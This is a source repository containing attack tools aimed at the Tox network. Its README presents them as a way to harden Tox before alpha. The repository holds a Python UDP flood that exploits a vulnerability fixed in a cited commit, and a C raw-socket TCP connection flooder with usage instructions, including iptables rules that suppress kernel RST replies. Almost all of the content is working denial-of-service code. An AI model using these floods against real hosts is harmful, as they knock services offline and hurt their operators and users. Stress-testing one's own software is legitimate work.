├── README.md ├── tox_dos.py └── stress └── tcp_kill.c /README.md: -------------------------------------------------------------------------------- 1 | This repo contains various pieces of code to attack the tox network. 2 | 3 | Before tox reaches alpha, it must be capable of defending itself against all of them. 4 | 5 | TODO: add more attacks. -------------------------------------------------------------------------------- /tox_dos.py: -------------------------------------------------------------------------------- 1 | #This exploits the vulnerability fixed by: 2 | # https://github.com/irungentoo/ProjectTox-Core/commit/89022326d3742defd9c7b1111ddcda53688d85be 3 | 4 | import socket, time 5 | 6 | NODE_IP = "127.0.0.1" 7 | NODE_PORT = 33445 8 | 9 | print "NODE target IP:", NODE_IP 10 | print "NODE target port:", NODE_PORT 11 | 12 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 13 | 14 | while 1: 15 | sock.sendto("", (NODE_IP, NODE_PORT)) 16 | time.sleep(0.001) 17 | -------------------------------------------------------------------------------- /stress/tcp_kill.c: -------------------------------------------------------------------------------- 1 | /* TCP_KILL 2 | * 3 | * Tool that uses raw sockets to flood the target with TCP connections. 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | #define c_sleep(x) usleep(1000*x) 19 | 20 | unsigned short csum(unsigned short *ptr,int nbytes) 21 | { 22 | long sum; 23 | unsigned short oddbyte; 24 | short answer; 25 | 26 | sum=0; 27 | while(nbytes>1) { 28 | sum+=*ptr++; 29 | nbytes-=2; 30 | } 31 | if(nbytes==1) { 32 | oddbyte=0; 33 | *((u_char*)&oddbyte)=*(u_char*)ptr; 34 | sum+=oddbyte; 35 | } 36 | 37 | sum = (sum>>16)+(sum & 0xffff); 38 | sum = sum + (sum>>16); 39 | answer=(short)~sum; 40 | 41 | return(answer); 42 | } 43 | 44 | 45 | typedef union __attribute__ ((__packed__)) 46 | { 47 | uint8_t uint8[4]; 48 | uint16_t uint16[2]; 49 | uint32_t uint32; 50 | struct in_addr in_addr; 51 | } 52 | IP4; 53 | 54 | struct __attribute__ ((__packed__)) TCP_PSEUDO_HEADER 55 | { 56 | uint32_t src; 57 | uint32_t dst; 58 | uint8_t zero; 59 | uint8_t prot; 60 | uint16_t length; 61 | }; 62 | 63 | struct __attribute__ ((__packed__)) TCP_HEADER 64 | { 65 | uint16_t src_port; 66 | uint16_t dst_port; 67 | uint32_t seq_number; 68 | uint32_t ack_number; 69 | uint8_t stuff[4]; 70 | uint16_t checksum; 71 | uint16_t urgent_pointer; 72 | uint8_t data[32]; 73 | uint16_t length; 74 | }; 75 | 76 | 77 | int main(int argc, char *argv[]) { 78 | if (argc != 5) { 79 | print_usage: 80 | printf("Tool that uses raw sockets to flood the target with TCP connections\n\ 81 | Usage: %s \n\ 82 | EX: %s 192.254.75.98 8000 192.168.2.10 0\n\n\ 83 | NOTE: this uses raw sockets so it must be run as root, you also need to disable kernel RST sending with:\n\ 84 | iptables -A OUTPUT -p tcp --dport 8000 --tcp-flags RST RST -j DROP\n\ 85 | where 8000 is the dst port.\n\n\ 86 | Use:\n\ 87 | iptables -F\n\ 88 | to clear the above iptables rule\n", argv[0], argv[0]); 89 | return 0; 90 | } 91 | 92 | 93 | IP4 dst_ip, src_ip; 94 | uint16_t port = strtoul(argv[2], 0, 0); 95 | unsigned long interval = strtoul(argv[4], 0, 0); 96 | if (inet_pton(AF_INET, argv[1], &dst_ip.in_addr) != 1) 97 | goto print_usage; 98 | 99 | if (inet_pton(AF_INET, argv[3], &src_ip.in_addr) != 1) 100 | goto print_usage; 101 | 102 | char addresstext[32]; 103 | inet_ntop(AF_INET, &dst_ip.in_addr, addresstext, sizeof(addresstext)); 104 | printf("Dest ip: %s:%u\n", addresstext, port); 105 | inet_ntop(AF_INET, &src_ip.in_addr, addresstext, sizeof(addresstext)); 106 | printf("Src ip: %s\nInterval between packets: %lu (us)\n", addresstext, interval); 107 | printf("Press Enter to Continue or CTRL-C to cancel\n"); 108 | while( getchar() != '\n' ); 109 | 110 | srand(time(0)); 111 | 112 | int sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP); 113 | if (sock < 0 || fcntl(sock, F_SETFL, O_NONBLOCK, 1) != 0) { 114 | printf("create sock failed %i\n", sock); 115 | return 1; 116 | } 117 | 118 | unsigned long count = 0, cc = 0, data_sent = 0; 119 | while (1) { 120 | struct sockaddr_storage addr = {0}; 121 | size_t addrsize; 122 | struct sockaddr_in *addr4 = (struct sockaddr_in *)&addr; 123 | 124 | addrsize = sizeof(struct sockaddr_in); 125 | addr4->sin_family = AF_INET; 126 | addr4->sin_addr = dst_ip.in_addr; 127 | addr4->sin_port = htons(port); 128 | struct TCP_PSEUDO_HEADER tcp_ps_header_req; 129 | struct TCP_HEADER tcp_header_req; 130 | tcp_ps_header_req.dst = dst_ip.uint32; 131 | tcp_ps_header_req.src = src_ip.uint32; 132 | tcp_ps_header_req.zero = 0; 133 | tcp_ps_header_req.prot = 6; 134 | 135 | tcp_header_req.length = 20; 136 | tcp_ps_header_req.length = htons(tcp_header_req.length); 137 | 138 | tcp_header_req.src_port = rand(); 139 | tcp_header_req.dst_port = htons(port); 140 | tcp_header_req.seq_number = rand(); 141 | tcp_header_req.ack_number = 0; 142 | tcp_header_req.stuff[0] = tcp_header_req.length * 2 * 2; 143 | tcp_header_req.stuff[1] = 2; 144 | tcp_header_req.stuff[2] = 0x72; 145 | tcp_header_req.stuff[3] = 0x10; 146 | tcp_header_req.checksum = 0; 147 | tcp_header_req.urgent_pointer = 0; 148 | 149 | struct __attribute__ ((__packed__)) { 150 | struct TCP_PSEUDO_HEADER tcp_ps_header_req; 151 | struct TCP_HEADER tcp_header_req; 152 | } 153 | TCP_PACKET; 154 | TCP_PACKET.tcp_ps_header_req = tcp_ps_header_req; 155 | TCP_PACKET.tcp_header_req = tcp_header_req; 156 | tcp_header_req.checksum = csum((void *)&TCP_PACKET, sizeof(tcp_ps_header_req) + tcp_header_req.length); 157 | 158 | int ret = sendto(sock, &tcp_header_req, tcp_header_req.length , 0, (struct sockaddr *)&addr, addrsize); 159 | if (ret > 0) 160 | data_sent += ret; 161 | 162 | while (1) { 163 | struct sockaddr_storage r_addr; 164 | socklen_t addrlen = sizeof(r_addr); 165 | uint8_t data[128] = {0}; 166 | int fail_or_len = recvfrom(sock, (char *) data, sizeof(data), 0, (struct sockaddr *)&r_addr, &addrlen); 167 | if (fail_or_len < 0) 168 | break; 169 | 170 | if (fail_or_len < 38 || data[0] != 0x45) 171 | continue; 172 | 173 | uint32_t ip_cmp; 174 | memcpy(&ip_cmp, data + 12, 4); 175 | if (ip_cmp != dst_ip.uint32) 176 | continue; 177 | 178 | uint32_t port_cmp; 179 | memcpy(&port_cmp, data + 20, 2); 180 | if (port_cmp != htons(port)) 181 | continue; 182 | 183 | if (data[33] != 0x12) { 184 | //printf("%u\n", data[33]); 185 | continue; 186 | } 187 | 188 | memcpy(&tcp_header_req.src_port, data + 22, 2); 189 | memcpy(&tcp_header_req.ack_number, data + 24, 4); 190 | memcpy(&tcp_header_req.seq_number, data + 28, 4); 191 | tcp_header_req.ack_number = htonl(ntohl(tcp_header_req.ack_number) + 1); 192 | 193 | tcp_header_req.stuff[1] = 0x10; 194 | tcp_header_req.checksum = 0; 195 | TCP_PACKET.tcp_ps_header_req = tcp_ps_header_req; 196 | TCP_PACKET.tcp_header_req = tcp_header_req; 197 | tcp_header_req.checksum = csum((void *)&TCP_PACKET, sizeof(tcp_ps_header_req) + tcp_header_req.length); 198 | ret = sendto(sock, &tcp_header_req, tcp_header_req.length , 0, (struct sockaddr *)&addr, addrsize); 199 | if (ret == tcp_header_req.length) { 200 | data_sent += ret; 201 | ++count; 202 | } 203 | } 204 | 205 | if (interval > 1000000 || cc > (1000000 / (interval + 1))) { 206 | printf("connections created: %lu total data sent: %lu bytes\n", count, data_sent); 207 | cc = 0; 208 | } 209 | 210 | if (interval) 211 | usleep(interval); 212 | 213 | ++cc; 214 | } 215 | } 216 | --------------------------------------------------------------------------------